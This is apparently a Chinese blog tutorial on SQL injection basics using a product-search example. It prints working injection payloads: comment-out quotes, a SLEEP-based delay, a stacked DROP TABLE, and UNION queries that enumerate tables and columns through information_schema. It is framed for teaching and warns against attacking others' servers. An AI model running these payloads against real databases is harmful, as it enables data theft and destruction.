sql string转为日期_SQL注入基本原理

34fa1a6eb27b3cc37ee7f1ee0f3f3e8d.png

WEB技术发展日新月异,但是徒手拼SQL的传统手艺还是受相当多的开发者亲睐。毕竟相比于再去学习一套复杂的ORM规则,手拼更说方便,直观。通常自己拼SQL的人,应该是有听说过SQL注入很危险,但是总是心想:我的SQL语句这么简单,不可能被注入的。

简单场景

有一个WEB界面提供输入商品名称,展示对应价格,生产日期及生产地信息。例如输入Hammer展示:

8ff2a0649c0ecda5f1915d20b0c299ad.png

我们跳过了搭建Web搜索界面的过程,直接关注重点部分: SQL注入

如果要实现以上功能,那么我们大致可以猜到服务器使用的SQL语句如下:

select ? from ? where ? like '%Hammer%';

其中?表示目前我们并不知道具体的表名和字段名,此SQL唯一可以被操纵的就是单引号里面的输入内容'%Hammer%。假如我们直接在查找框里输入一个单引号。即变成

select ? from ? where ? Like '%'%';    

这样拼接后造成SQL语法错误,得不到任何结果,我们需要使用--来把最后一个单引号注释掉。

select ? from ? where ? Like '%'; -- %';    

*注意第二个单引号是我们自己加的,原有的单引号在句未,已被我们注释掉啦*。

--后的是注释内容(你也可以用#),这样你可以得到所有的产品信息,目前为止,还是没有嗅到危险的信号。

f948c525484198d61ceb06eb0d18355d.png

小试牛刀and

紧紧抓住上一步中可以扩展的单引号部分。来一个简单的延时语句试一试:

select ? from ? where ? Like '%Hammer%' 
and 1 = SLEEP(2); -- %';  

这时查询会2秒后才返回结果,如果把时间延长,用脚本多点几次查询,一下就能把数据库的连接池用完。

当然,还有破坏力更强的!

select ? from ? where ? Like '%Hammer%'; 
drop table xxxx; -- %'; 

可以直接把表/数据库直接删除掉,至于如何知道引数据库中有哪一些表(即如何确定上句SQL中的xxxx)呢?

为所欲为union

我们需要知道此数据库有哪一些表!这样才能能拿到有用的信息。

使用union可以把不同表的内容拼在一起,小试一下:

select ?,?,?,? from ? where ? Like '%Hammer%' UNION 
(select 1,2,3,4 from dual); -- %';  

acab1b6fd848d74f84efd244f58dc458.png

可以看到我们把假数据1,2,3,4成功地拼接到搜索结果中。

Mysql系统自带的信息都存在information_schema数据库中。我们试着在里面找找有用的信息。

select ? from ? where ? Like '%Hammer%' UNION 
(select TABLE_NAME,TABLE_SCHEMA,3,4 
  from information_schema.tables); -- %';  

8ed1bbb5cc7e0cb4c31b7c8b59b8344b.png

现在知道了这些数据库名和表名,所有人都对它为所欲为了!(包括上面执行的DROP)。

看着列表一猜就能知道我们目前查的是products表,接下来我们再把products具体的字段也挖出来。

select ? from ? where ? Like '%Hammer%' UNION 
(select COLUMN_NAME,TABLE_SCHEMA,3,4 
  from imformation_schema.columns 
  where table_name = 'products'); -- %';  

768290c4edc55371d7f41fad59de8b55.png

所以,通过上面2步,我们知道了表名和字段名,那么查询API的完整SQL应该是(把上面的?都补全啦):

select name,price,address,updated_at 
from products 
where name like '%Hammer%';

通过不断重复以上几个步骤,你就可以通过这一个小小的入口把数据库的所有信息(比如上面发现的user表 )都翻个遍。

注意:以上都是在自己的机器上尝试的,千万不要越界去hack别人家的服务器!

如果你SQL注入想要更深入/系统的学习,可以使用当然你可以自己本地搭建DVWA,或挑战HackMe-SQL-Injection-Challenges。

Github存档:

SQL注入基本原理​notes.tried.cc
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值